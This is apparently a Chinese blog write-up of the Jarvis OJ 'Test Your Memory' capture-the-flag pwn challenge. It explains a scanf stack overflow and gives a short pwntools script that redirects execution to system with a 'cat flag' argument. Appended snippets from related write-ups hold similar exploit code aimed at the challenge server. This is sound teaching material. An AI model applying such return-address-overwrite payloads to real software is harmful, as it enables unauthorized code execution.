18.9.20 Jarvis OJ PWN----Test Your Memory

最新推荐文章于 2021-12-27 20:06:21 发布
最新推荐文章于 2021-12-27 20:06:21 发布
阅读量317 收藏
点赞数
分类专栏: PWN_WP 文章标签: Test Your Memory PWN Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/82785272
版权

先checksec一下

可以栈溢出

放到IDA里看一下,发现有system函数(在函数with_func中调用),喜出望外,同时搜索字符串时,可以发现打开flag的指令,如下

再看一下哪里可以溢出,在mem_test函数中,scanf就可以溢出

直接上脚本吧

#代码主体

system_addr=bin.symbols['win_func']
payload='a'*(0x13+0x04)+p32(system_addr)+p32(0x080487E0)+p32(0x080487E0)
cn.recvuntil("cff flag go go go ...\n")
cn.recvline()
cn.sendline(payload)
cn.interactive()

 

 

 

xiaoyuyulala
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 826
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
JarvisOJ pwn Test Your Memory
苗_的博客
02-24 243
先找到几个关键函数: 单击main看一下函数结构: 点进mem_test看下: 找到溢出点:scanf 点进去hint发现了cat flag字符串..... (问题突然变得很简单....ret2libc) exp: from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 221
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
jarvisoj_test_your_memory
m0sway的博客
12-27 1252
jarvisoj_test_your_memory 使用checksec查看: 只开启了栈不可执行,应该还是一道栈溢出题目。 放进IDA中查看: 先是用printf()输出了一个不知道什么玩意的东西 然后调用men_test() 跟进查看men_test(): printf("0x%x \n", hint);:输出了hint的地址 __isoc99_scanf("%s", &s);:存在栈溢出,距离ebp0x13 题目思路: 题目存在栈溢出,可以进行溢出调用system 题目
Jarvis OJ-pwn test your memory
hanqdi_的博客
02-06 214
pwn test your memory 运行一下 检查保护机制 只开启堆栈不可执行保护。 观察反汇编代码,main函数里随机产生一串字符串,然后调用mem_test进行检测。 mem_test函数,先打印一个地址(hint),再输入s,这里存在栈溢出漏洞,然后输入的s与随机产生的字符串比较。 点进hint,提示是cat flag命令,可以获得flag 程序中已有system函数。 ...
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
Python库 | jarvis_ironman-5.3.1-py2.py3-none-any.whl
02-16
Python库“jarvis_ironman-5.3.1-py2.py3-none-any.whl”是一个用于Python开发的重要工具,特别适用于后端开发。这个库的版本为5.3.1,支持Python 2和Python 3两种解释器,表明它具有良好的向后兼容性,能满足不同...
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
jarvis
03-08
wasm-pack-template 用于使用启动Rust和WebAssembly项目的模板。 | 内置 :crab: :spider_web: 由 关于 该模板用于将Rust库编译到WebAssembly中,并将结果包发布到NPM。 一定要检查出为其他模板和用法wasm-pack 。 :person_biking: 用法 :ewe: 使用cargo generate来克隆此模板 cargo generate --git https://github.com/rustwasm/wasm-pack-template.git --name my-project cd my-project :hammer_and_wrench: 使用wasm-pack build wasm-pack build :microscope: 使用wasm-pack test在无头浏览器中进行wasm-pack test wasm-pack test --headless --firefox :wrapped_gift: 使用wa
贾维斯系统音效
01-16
贾维斯系统音效 WAV格式,用来做开机音效果还是不错的
jarvisoj——Test Your Memory
王嘟嘟的博客
07-31 748
题目 Wp 基本项检查,32位,开了NX,got表可写 这里看到alphanum_2626和mem_test 跟进mem_test,可以看到是scanf 这里可以看到偏移,直接上payload 这里一定要有返回地址,不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e
Jarvis oj Test your Memory writeup
ditto的博客
01-05 868
简单的ret2plt 检查下防护,只开了NX。 放ida里: 问题出在mem_test函数里: 点开hint,发现了有"cat flag"这个字符串: 而且还在rodata区里,那直接硬编码就可以了。 程序本身调用了system函数,那直接ret2plt就行了。 根据ida计算出溢出点: 溢出点0x13+4。 编写exp: from pwn import* a=remote("p...
buuoj jarvisoj_test_your_memory
pondzhang的专栏
03-26 293
存在溢出漏洞: 进行了逻辑判断,相等则输出good job!!! 从堆栈上看,s2在return地址下面。 整合上面,便于脚本如下: from pwn import* p = process('./memory') system_addr = 0x08048440 catflag_addr = 0x080487E0 payload='A'*0x17 + p32(system_addr...
[BUUCTF]PWN——jarvisoj_test_your_memory
mcmuyanga的博客
11-06 482
jarvisoj_test_your_memory 附件 步骤: 例行检查,32位程序,开启了nx保护 试运行一下程序,看看大概的情况 32
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值